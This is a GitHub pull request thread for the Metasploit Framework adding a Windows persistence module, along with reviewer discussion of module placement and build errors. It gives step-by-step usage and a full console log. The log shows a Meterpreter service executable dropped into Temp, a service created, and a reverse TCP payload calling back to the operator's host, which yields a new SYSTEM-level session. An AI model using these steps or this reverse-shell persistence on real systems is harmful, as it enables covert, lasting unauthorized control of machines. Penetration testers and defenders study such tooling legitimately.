Add exploit module windows persistent service

[Green-m]

Note: This PR rely on #10821, please merge that before merge this. Could be merged now.

resolved #10385

Verification steps

• get session on target
• use post/windows/manage/persistence_service
• set payload <payload>
• set lport <lport>
• set lhost <lhost>
• set handler true
• run

Usage

msf5 post(windows/manage/persistence_service) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: test-PC\test
meterpreter > sysinfo
Computer        : TEST-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 post(windows/manage/persistence_service) > options

Module options (post/windows/manage/persistence_service):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   HANDLER  true                             no        Start an exploit/multi/handler to receive the connection
   LHOST    192.168.56.1                     yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        The payload to use in the service.
   SESSION  1                                yes       The session to run this module on.
msf5 post(windows/manage/persistence_service) > run

[*] Running module against TEST-PC
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.56.1:4433
[+] Meterpreter service exe written to C:\Users\test\AppData\Local\Temp\IDJkb.exe
[*] Creating service pWbPkeDm
[*] Cleanup Meterpreter RC File: /Users/green/.msf4/logs/persistence/TEST-PC_20181017.3740/TEST-PC_20181017.3740.rc
[*] Post module execution completed
[*] Sending stage (179779 bytes) to 192.168.56.101
msf5 post(windows/manage/persistence_service) > [*] Meterpreter session 3 opened (192.168.56.1:4433 -> 192.168.56.101:50101) at 2018-10-17 18:37:51 +0800
msf5 post(windows/manage/persistence_service) > sessions

Active sessions
===============

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  1         meterpreter x86/windows  test-PC\test @ TEST-PC         192.168.56.1:8888 -> 192.168.56.101:50098 (192.168.56.101)
  3         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ TEST-PC  192.168.56.1:4433 -> 192.168.56.101:50101 (192.168.56.101)

msf5 post(windows/manage/persistence_service) >

Enjoy it!

[h00die]

All I had time to check this evening. I <3 that cleanup script!!!

Interesting idea, (didn't review this far in code) should it just print the rc location, or should it be saved some where? Loot doesn't feel right, but a screen can close or log lost. If this was databased somewhere it would be easier to find after say a 30 day engagement

[Green-m]

Thanks for your review! @h00die!
The clean up file location is actually a little obscure and not readable. Put it into database is a good idea! I will try this approach.
Doc error has been fixed.

[wchen-r7]

Would this be easier if the module was a windows/local exploit? You wouldn't have to worry about handler.

[Green-m]

@wchen-r7
Yes, that sounds good!
And a little question about what is the difference between modules in exploit/windows/local/* and post/windows/?

I see a lot of persistence modules, some locate exploit/xx/local and others locate post.

msf5 exploit(windows/local/wmi_persistence) > search persistence

Matching Modules
================

   Name                                               Disclosure Date  Rank       Check  Description
   ----                                               ---------------  ----       -----  -----------
   auxiliary/server/regsvr32_command_delivery_server                   normal     No     Regsvr32.exe (.sct) Command Delivery Server
   exploit/linux/local/autostart_persistence          2006-02-13       excellent  No     Autostart Desktop Item Persistence
   exploit/linux/local/cron_persistence               1979-07-01       excellent  No     Cron Persistence
   exploit/linux/local/rc_local_persistence           1980-10-01       excellent  No     rc.local Persistence
   exploit/linux/local/service_persistence            1983-01-01       excellent  No     Service Persistence
   exploit/osx/local/persistence                      2012-04-01       excellent  No     Mac OS X Persistent Payload Installer
   exploit/osx/local/sudo_password_bypass             2013-02-28       normal     Yes    Mac OS X Sudo Password Bypass
   exploit/unix/local/at_persistence                  1997-01-01       excellent  Yes    at(1) Persistence
   exploit/windows/local/persistence                  2011-10-19       excellent  No     Windows Persistent Registry Startup Payload Installer
   exploit/windows/local/ps_wmi_exec                  2012-08-19       excellent  No     Authenticated WMI Exec via Powershell
   exploit/windows/local/registry_persistence         2015-07-01       excellent  Yes    Windows Registry Only Persistence
   exploit/windows/local/s4u_persistence              2013-01-02       excellent  No     Windows Manage User Level Persistent Payload Installer
   exploit/windows/local/vss_persistence              2011-10-21       excellent  No     Persistent Payload in Windows Volume Shadow Copy
   exploit/windows/local/wmi_persistence              2017-06-06       normal     No     WMI Event Subscription Persistence
   exploit/windows/smb/psexec_psh                     1999-01-01       manual     No     Microsoft Windows Authenticated Powershell Command Execution
   post/linux/manage/sshkey_persistence                                excellent  No     SSH Key Persistence
   post/windows/gather/enum_ad_managedby_groups                        normal     No     Windows Gather Active Directory Managed Groups
   post/windows/manage/persistence_exe                                 normal     No     Windows Manage Persistent EXE Payload Installer

I am a little confused, for I thought the all post-exploitation modules should be put in post, is there something changed or I am wrong?

I just joined the Metasploit team for not long, forgive my ignorance.

[timwr]

I agree this should be an exploit module. In general if your module has a payload it should be an exploit module. If it uses a session but no payload it should be a post module. Neither is auxiliary.
Unfortunately I think the session upgrade (https://github.com/rapid7/metasploit-framework/blob/master/modules/post/multi/manage/shell_to_meterpreter.rb) module is the edge case here but it should be refactored into an exploit.

[timwr]

@github is broken

[Green-m]

Thank @timwr for explaining.
I have moved it to exploit/windows/local. @wchen-r7

[sempervictus]

I think this is the most complete metasm SVC template I've seen. Awesome, thank you. Will test this weekend.

[jrobles-r7]

I'm getting an error when I run the module.

msf5 exploit(windows/local/persistence_service) > exploit 

[*] Running module against DESKTOP-IPOGIJR
[-] Exploit failed: Metasm::ParseError No such file or directory "sys/cdefs.h" near "include" at "</usr/include/features.h>" line 364,
	included from "</usr/include/string.h>" line 27,
	included from "\"<unk>\"" line 3

Are additional header files needed for this module?

[jrobles-r7]

After merging in master locally, I'm getting the following error

msf5 exploit(windows/local/persistence_service) > exploit

[*] Started reverse TCP handler on 172.22.222.136:5555 
[*] Running module against DESKTOP-IPOGIJR
[-] Exploit failed: Metasm::ParseError undefined variable near "_snprintf" at "\"<unk>\"" line 983
[*] Exploit completed, but no session was created.

[wchen-r7]

@jrobles-r7 So when I was merging #10821, I might have skipped snprintf for a reason. You might want to try a different function to achieve what snprintf needs... maybe. Let me know if you have trouble. Sorry about that.

[Green-m]

06e1d16

I found this commit, remove it on account of the crash. I am not very sure which way to achieve it for do not know how it crashed.

[jrobles-r7]

@Green-m I opened a new PR for these changes since merging in master caused the page to shows lots of commits and files changed.